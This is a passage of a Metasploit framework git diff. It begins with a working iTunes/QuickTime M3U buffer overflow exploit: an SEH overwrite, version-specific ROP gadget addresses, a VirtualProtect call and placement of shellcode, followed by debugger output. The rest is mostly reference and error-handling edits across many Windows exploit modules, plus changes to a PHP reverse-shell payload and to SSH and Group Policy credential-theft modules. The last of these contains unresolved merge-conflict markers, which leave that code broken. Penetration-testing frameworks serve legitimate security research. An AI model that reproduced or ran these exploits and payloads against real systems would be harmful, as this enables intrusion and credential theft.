+ send_redirect(cli, m3u_location)
+ else
+ print_status("Unknown User-Agent: #{agent}")
+ send_not_found(cli)
+ end
+ end
+
+
+ # IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
+ # ... so use html
+ def generate_redirect_ie(m3u_location)
+ ie_redir = <<-HTML_REDIR
+
+
+
+
+
+
+ HTML_REDIR
+
+ ie_redir = ie_redir.gsub(/^\t\t\t/, '')
+
+ return ie_redir
+ end
+
+
+ def generate_m3u(payload)
+ # Bypass stack cookies by triggering a SEH exception before
+ # the cookie gets checked. SafeSEH is bypassed by using a non
+ # safeSEH DLL [QuickTime.qts].
+
+ # stack buffer overflow ->
+ # overwrite SEH handler ->
+ # trigger SEH exception ->
+ # rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
+ # virtualprotect and execute shellcode
+
+ m3u = '#EXTINF:,'
+
+ # stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
+ # ... so ensure we overwrite a SEH handler to get back to our rop chain
+ m3u << [target.ret].pack("V") * 0x6a # stack pivot/rewind
+ m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
+ m3u << gimme_rop
+ m3u << payload
+
+ # 0x1000 should be enough to overflow the stack and trigger SEH
+ m3u << rand_text_alphanumeric(0x1000 - m3u.length)
+
+ return m3u
+
+ end
+
+
+ def gimme_rop
+ # thanx to mona.py :)
+ rop_chain = [
+ :popad,
+ # registers
+ 0x66801044, # EDI: RET
+ 0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
+ :jmpesp,
+ junk,
+ :ebx, # EBX: Becomes 0x3e8
+ 0xffffffd6, # EDX: Becomes 0x40
+ 0x673650b0, # ECX: lpflOldProtect
+ 0x90909090, #EAX
+ # correct dwSize and flNewProtect
+ :modebx,
+ :addedx,
+ # throw it on the stack
+ :pushad
+ ]
+
+ # Map gadgets to a specific Quicktime version
+ rop_chain.map! { |g|
+ case target.name
+ when /QuickTime 7\.69/
+ case g
+ when :popad then 0x66C3E260
+ when :jmpesp then 0x669F6E21
+ when :ebx then 0x4CC48017
+ when :modebx then 0x669A8648 # xor ebx,4CC483FF; ret
+ when :addedx then 0x669FC1C6 # add edx, 0x6a; ret
+ when :pushad then 0x6682A67E
+ else
+ g
+ end
+
+ when /QuickTime 7\.70/
+ case g
+ when :popad then 0x66926F5B
+ when :jmpesp then 0x66d6b743
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66b7d8cb # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975556 # add edx, 0x6a; ret
+ when :pushad then 0x6689B829
+ else
+ g
+ end
+
+ when /QuickTime 7\.71/
+ case g
+ when :popad then 0x668E2BAA
+ when :jmpesp then 0x66965F78
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66B7DC4B # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975956 # add edx, 0x6a; ret
+ when :pushad then 0x66C28B70
+ else
+ g
+ end
+
+ when /QuickTime 7\.72/
+ case g
+ when :popad then 0x66c9a6c0
+ when :jmpesp then 0x6697aa03
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66b7de1b # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975c56 # add edx, 0x6a; ret
+ when :pushad then 0x6684b5c6
+ else
+ g
+ end
+ end
+ }
+
+ rop_chain.pack("V*")
+ end
+
+
+ def junk
+ rand_text_alpha(4).unpack("L")[0].to_i
+ end
+
+end
+
+=begin
+0:000> r
+eax=0e5eb6a0 ebx=00000000 ecx=00000183 edx=00000003 esi=0e5eb091 edi=00130000
+eip=10ceaa7a esp=0012ee5c ebp=0012ee64 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+iTunes_10000000!iTunesMainEntryPoint+0xb93f3a:
+10ceaa7a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+0:000> k
+ChildEBP RetAddr
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012ee64 10356284 iTunes_10000000!iTunesMainEntryPoint+0xb93f3a
+0012eea4 1035657c iTunes_10000000!iTunesMainEntryPoint+0x1ff744
+0012eed8 1034de49 iTunes_10000000!iTunesMainEntryPoint+0x1ffa3c
+00000000 00000000 iTunes_10000000!iTunesMainEntryPoint+0x1f7309
+0:000> !address esi
+ 0c720000 : 0d87d000 - 00ea3000
+ Type 00020000 MEM_PRIVATE
+ Protect 00000004 PAGE_READWRITE
+ State 00001000 MEM_COMMIT
+ Usage RegionUsageHeap
+ Handle 0c720000
+0:000> !address edi-10
+ 00030000 : 000ee000 - 00042000
+ Type 00020000 MEM_PRIVATE
+ Protect 00000004 PAGE_READWRITE
+ State 00001000 MEM_COMMIT
+ Usage RegionUsageStack
+ Pid.Tid d1c.d0c
+=end
diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb
index 3daab88dab..3655e0a479 100644
--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2009-5109'],
[ 'OSVDB', '61341' ],
[ 'EDB', 10745 ],
],
diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb
index 71935dba57..c9f8a72391 100644
--- a/modules/exploits/windows/misc/mirc_privmsg_server.rb
+++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-4449' ],
[ 'OSVDB', '48752' ],
[ 'BID', '31552' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/6666' ],
+ [ 'EDB', '6666' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb
index 73cbf2fd20..c24e4fa002 100644
--- a/modules/exploits/windows/misc/netcat110_nt.rb
+++ b/modules/exploits/windows/misc/netcat110_nt.rb
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-1317' ],
[ 'OSVDB', '12612' ],
[ 'BID', '12106' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/726' ],
+ [ 'EDB', '726' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb
index 7c6038a6fe..3e180ad102 100644
--- a/modules/exploits/windows/misc/sap_2005_license.rb
+++ b/modules/exploits/windows/misc/sap_2005_license.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '56837' ],
[ 'CVE', '2009-4988' ],
[ 'BID', '35933' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
+ [ 'EDB', '9319' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb
index 211677b975..0ac469682d 100644
--- a/modules/exploits/windows/misc/stream_down_bof.rb
+++ b/modules/exploits/windows/misc/stream_down_bof.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'StreamDown 6.8.0 Buffer Overflow',
+ 'Name' => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
'Description' => %q{
Stream Down 6.8.0 seh based buffer overflow triggered when processing
the server reponse packet.During the overflow a structured exception
@@ -23,6 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Fady Mohamed Osman ',
'References' =>
[
+ ['CVE', '2011-5052'],
['OSVDB', '78043'],
['BID', '51190'],
['URL', 'http://www.dark-masters.tk/'],
diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb
index a72788f2dc..6779dbded2 100644
--- a/modules/exploits/windows/misc/talkative_response.rb
+++ b/modules/exploits/windows/misc/talkative_response.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '64582'],
[ 'BID', '34141' ],
- [ 'URL', 'http://milw0rm.com/exploits/8227' ],
+ [ 'EDB', '8227' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
index da5817d9d4..332719052b 100644
--- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
+++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
def make_tcpmsghdr(data)
len = data.length
# The server doesn't like packets that are bigger...
- raise RuntimeError, 'Length too big' if (len > 0x1000)
+ fail_with(Exploit::Failure::BadConfig, 'Message length is too big') if (len > 0x1000)
len /= 8
# Pack the pieces in ...
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
index 8d03bda5f6..e9b25ababe 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5416' ],
[ 'BID', '32710' ],
[ 'MSB', 'MS09-004' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7501' ]
+ [ 'EDB', '7501' ]
],
'DefaultOptions' =>
{
@@ -287,7 +287,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting automatic target detection...")
version = mssql_query_version
- raise RuntimeError, "Unable to get version!" if not version
+ fail_with(Exploit::Failure::NoAccess, "Unable to retrieve version information") if not version
if (version =~ /8\.00\.194/)
mytarget = targets[1]
@@ -308,7 +308,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if mytarget.nil?
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to determine target")
else
print_status("Automatically detected target \"#{mytarget.name}\"")
end
@@ -385,7 +385,7 @@ exec sp_executesql @z|
# go!
if (not mssql_login_datastore)
- raise RuntimeError, "Unable to log in!"
+ fail_with(Exploit::Failure::NoAccess, "Unable to log in!")
end
begin
mssql_query(runme, datastore['VERBOSE'])
@@ -460,7 +460,7 @@ exec sp_executesql @z|
end
if (not logged_in)
- raise RuntimeError, "Invalid SQL Server credentials"
+ fail_with(Exploit::Failure::NoAccess, "Invalid SQL Server credentials")
end
res = mssql_query("select @@version", datastore['VERBOSE'])
disconnect
@@ -471,7 +471,7 @@ exec sp_executesql @z|
res[:errors].each do |err|
errstr << err
end
- raise RuntimeError, errstr
+ fail_with(Exploit::Failure::Unknown, errstr)
end
if not res[:rows] or res[:rows].empty?
diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
index 350ba90f27..4ee4950ae1 100644
--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-5416' ],
[ 'BID', '32710' ],
[ 'MSB', 'MS09-004' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/7501' ],
+ [ 'EDB', '7501' ],
[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/' ]
],
'DefaultOptions' =>
@@ -289,7 +289,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Attempting automatic target detection...")
version = mssql_query_version
- raise RuntimeError, "Unable to get version!" if not version
+ fail_with(Exploit::Failure::NoAccess, "Unable to get version!") if not version
if (version =~ /8\.00\.194/)
mytarget = targets[1]
@@ -310,7 +310,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if mytarget.nil?
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
else
print_status("Automatically detected target \"#{mytarget.name}\"")
end
diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb
index ffc7432326..423ce99944 100644
--- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb
+++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
version = tns_version
if (not version)
- raise RuntimeError, "Unable to detect the Oracle version!"
+ fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
end
print_status("Oracle version reply: " + version)
return Exploit::CheckCode::Vulnerable if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
version = tns_version
if (not version)
- raise RuntimeError, "Unable to detect the Oracle version!"
+ fail_with(Exploit::Failure::Unknown, "Unable to detect the Oracle version!")
end
if (version =~ /32-bit Windows: Version 10\.2\.0\.1\.0/)
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "Unable to automatically detect the target"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target")
end
print_status("Automatically detected target \"#{mytarget.name}\"")
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = sock.get_once(-1, 1)
rescue ::Errno::ECONNRESET, EOFError
- raise RuntimeError, "OOPS, maybe the service hasn't started completely yet, try again..."
+ fail_with(Exploit::Failure::Unknown, "OOPS, maybe the service hasn't started completely yet, try again...")
end
#print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
@@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote
# expecting disconnect...
if (res = sock.get_once(-1, 1))
print_status(("received %u bytes:\n" % res.length) + Rex::Text.to_hex_dump(res))
- raise RuntimeError, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/"
+ fail_with(Exploit::Failure::NoTarget, "Try to run the exploit again.. If that doesn't work, the target host may be patched :-/")
end
handler
diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
index 1b8f62d878..7977fa9a92 100644
--- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
+++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-2416' ],
[ 'OSVDB', '11593' ],
[ 'BID', '11666' ],
- [ 'URL', 'http://milw0rm.com/exploits/621' ],
+ [ 'EDB', '621' ],
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/scada/codesys_web_server.rb b/modules/exploits/windows/scada/codesys_web_server.rb
index 4a2fcfad0d..6323c9d99d 100644
--- a/modules/exploits/windows/scada/codesys_web_server.rb
+++ b/modules/exploits/windows/scada/codesys_web_server.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2011-5007'],
[ 'OSVDB', '77387'],
[ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
[ 'EDB', 18187 ],
diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
index 35d5ec3f9b..98f5f3bac5 100644
--- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
+++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
@@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2011-2089'],
['OSVDB', '72135'],
['URL', 'http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf'],
['EDB', 17240],
diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb
index 3daf20b4f2..ebbbc4fa69 100644
--- a/modules/exploits/windows/scada/igss9_misc.rb
+++ b/modules/exploits/windows/scada/igss9_misc.rb
@@ -36,6 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ [ 'CVE', '2011-1565'],
+ [ 'CVE', '2011-1566'],
[ 'OSVDB', '72354'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.altervista.org/adv/igss_1-adv.txt' ], #Write File packet flaw
diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb
index df3af42a45..9c0f54a7b8 100644
--- a/modules/exploits/windows/scada/moxa_mdmtool.rb
+++ b/modules/exploits/windows/scada/moxa_mdmtool.rb
@@ -29,20 +29,21 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ [ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
- [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ],
+ [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
- 'InitialAutoRunScript' => 'migrate -f',
+ 'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
- 'StackAdjustment' => -3500,
+ 'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb
index 99dbd51718..92ea664d25 100644
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
- #[ 'CVE', '?'],
+ [ 'CVE', '2011-3497'],
[ 'OSVDB', '75490'],
[ 'BID', '49613'],
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb
index 3817185659..66661b4c2d 100644
--- a/modules/exploits/windows/scada/winlog_runtime_2.rb
+++ b/modules/exploits/windows/scada/winlog_runtime_2.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
- 'Name' => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14',
+ 'Name' => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16',
'Description' => %q{
- This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.14.
+ This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.
When sending a specially formatted packet to the Runtime.exe service on port 46824,
an attacker may be able to execute arbitrary code.
},
@@ -29,7 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'BID', '53811'],
- [ 'URL', 'http://www.s3cur1ty.de' ],
+ [ 'OSVDB', '82654'],
+ [ 'EDB', '18986'],
+ [ 'URL', 'http://www.s3cur1ty.de/m1adv2012-001' ],
[ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]
],
'DefaultOptions' =>
@@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
- [ 'Sielco Sistemi Winlog 2.07.14 - Ceramics Kiln Project',
+ [ 'Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project',
{
'Ret' => 0x405153df,
'Offset' => 167,
diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
index ed446f0463..2fbc86ecba 100644
--- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb
+++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
@@ -103,13 +103,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Detected a Windows XP SP0/SP1 target")
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
if (e.error_code == 0xc0000022)
- raise RuntimeError, "Windows XP SP2 requires Administrator privileges!"
+ fail_with(Exploit::Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")
end
print_status("Detected a Windows XP target (unknown patch level)")
end
mytarget = targets[2]
else
- raise RuntimeError, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}..."
+ fail_with(Exploit::Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
end
else
mytarget = target
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index 0fca26511b..6f31d6bd3e 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -790,7 +790,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Bail early on unknown OS
if(fprint['os'] == 'Unknown')
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
# Windows 2000 is mostly universal
@@ -845,7 +845,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if(not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
@@ -1174,7 +1174,7 @@ class Metasploit3 < Msf::Exploit::Remote
rop.map! { |e|
if e.kind_of? String
# Meta-replace (RVA)
- raise RuntimeError, "Unable to locate key: \"#{e}\"" if not rvas[e]
+ fail_with(Exploit::Failure::BadConfig, "Unable to locate key: \"#{e}\"") if not rvas[e]
module_base + rvas[e]
elsif e == :unused
diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb
index 5d5752359f..44e1d94079 100644
--- a/modules/exploits/windows/smb/ms10_061_spoolss.rb
+++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Open the printer
status,ph = open_printer_ex(pname)
if status != 0
- raise RuntimeError, "Unable to open printer: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}")
end
print_status("Printer handle: %s" % ph.unpack('H*'))
@@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
# ClosePrinter
status,ph = close_printer(ph)
if status != 0
- raise RuntimeError, "Failed to close printer: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}")
end
break if session_created?
@@ -180,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, Rex::ConnectionError
- raise RuntimeError, $!.message
+ fail_with(Exploit::Failure::Unknown, $!.message)
end
@@ -194,21 +194,21 @@ class Metasploit3 < Msf::Exploit::Remote
# StartDocPrinter
status,jobid = start_doc_printer(ph, doc, fname)
if status != 0 or jobid < 0
- raise RuntimeError, "Unable to start print job: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}")
end
print_status("Job started: 0x%x" % jobid)
# WritePrinter
status,wrote = write_printer(ph, data)
if status != 0 or wrote != data.length
- raise RuntimeError, ('Failed to write %d bytes!' % data.length)
+ fail_with(Exploit::Failure::Unknown, ('Failed to write %d bytes!' % data.length))
end
print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname])
# EndDocPrinter
status = end_doc_printer(ph)
if status != 0
- raise RuntimeError, "Failed to end print job: #{Msf::WindowsError.description(status)}"
+ fail_with(Exploit::Failure::Unknown, "Failed to end print job: #{Msf::WindowsError.description(status)}")
end
end
diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
index cfbf6bbdad..cfd7f1cc08 100644
--- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
+++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2004-1638' ],
[ 'OSVDB', '11174' ],
[ 'BID', '11535' ],
- [ 'URL', 'http://milw0rm.com/exploits/598' ],
+ [ 'EDB', '598' ],
],
'Platform' => ['win'],
'Arch' => [ ARCH_X86 ],
diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
index ae6e2a2118..95151dce66 100644
--- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
+++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '8838' ],
[ 'OSVDB', '2674' ],
[ 'MSB', 'MS03-046' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/113' ],
+ [ 'EDB', '113' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb
index b7b8da687e..28178c019c 100644
--- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb
+++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '76728' ],
- #[ 'CVE', '' ],
+ [ 'CVE', '2011-4040' ],
[ 'URL', 'http://www.njstar.com/cms/njstar-communicator' ],
[ 'EDB', 18057 ]
],
diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
index 0ab998578b..51a6ba6641 100644
--- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
+++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-4948' ],
[ 'OSVDB', '29032' ],
[ 'BID', '20131' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3132' ],
+ [ 'EDB', '3132' ],
],
'DefaultOptions' =>
{
diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb
index 01cb95f8b7..e280df2c13 100644
--- a/modules/payloads/singles/php/reverse_php.rb
+++ b/modules/payloads/singles/php/reverse_php.rb
@@ -69,7 +69,7 @@ module Metasploit3
end
shell=<<-END_OF_PHP_CODE
- $ipaddr=#{ipaddr};
+ $ipaddr='#{ipaddr}';
$port=#{port};
#{php_preamble({:disabled_varname => "$dis"})}
diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb
index a1e78f670a..acfda0743d 100644
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -40,7 +40,8 @@ class Metasploit3 < Msf::Post
def run
print_status("Finding .ssh directories")
paths = enum_user_directories.map {|d| d + "/.ssh"}
- paths.select! { |d| directory?(d) }
+ # Array#select! is only in 1.9
+ paths = paths.select { |d| directory?(d) }
if paths.nil? or paths.empty?
print_error("No users found with a .ssh directory")
diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb
index c120f3d5e6..919727ddc3 100644
--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -8,10 +8,18 @@
require 'msf/core'
require 'rex'
require 'rexml/document'
+<<<<<<< HEAD
+=======
+require 'msf/core/post/windows/registry'
+>>>>>>> upstream/master
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::Windows::Priv
+<<<<<<< HEAD
+=======
+ include Msf::Post::Windows::Registry
+>>>>>>> upstream/master
def initialize(info={})
super( update_info( info,
@@ -22,6 +30,7 @@ class Metasploit3 < Msf::Post
files containing local user accounts and passwords and decrypts them
using Microsofts public AES key.
+<<<<<<< HEAD
Users can specify DOMAINS="domain1 domain2 domain3 etc" to target specific
domains on the network. This module will enumerate any domain controllers for
those domains.
@@ -35,13 +44,21 @@ class Metasploit3 < Msf::Post
Using the ALL or DOMAINS flags whilst on a DC will not enumerate that DC as it
is looking externally on the network for other Domain Controllers, however the
default (CURRENT=True which inspects the registry) should work successfully.
+=======
+ Tested on WinXP SP3 Client and Win2k8 R2 DC.
+>>>>>>> upstream/master
},
'License' => MSF_LICENSE,
'Author' =>[
'Ben Campbell ',
'Loic Jaquemet ',
'scriptmonkey ',
+<<<<<<< HEAD
'TheLightCosine '
+=======
+ 'TheLightCosine ',
+ 'Rob Fuller ' #domain/dc enumeration code
+>>>>>>> upstream/master
],
'References' =>
[
@@ -54,6 +71,7 @@ class Metasploit3 < Msf::Post
'SessionTypes' => [ 'meterpreter' ]
))
+<<<<<<< HEAD
register_options(
[
OptBool.new('CURRENT', [ false, 'Enumerate current machine domain.', true]),
@@ -190,6 +208,113 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ register_options([
+ OptBool.new('ALL', [ false, 'Enumerate all domains on network.', true]),
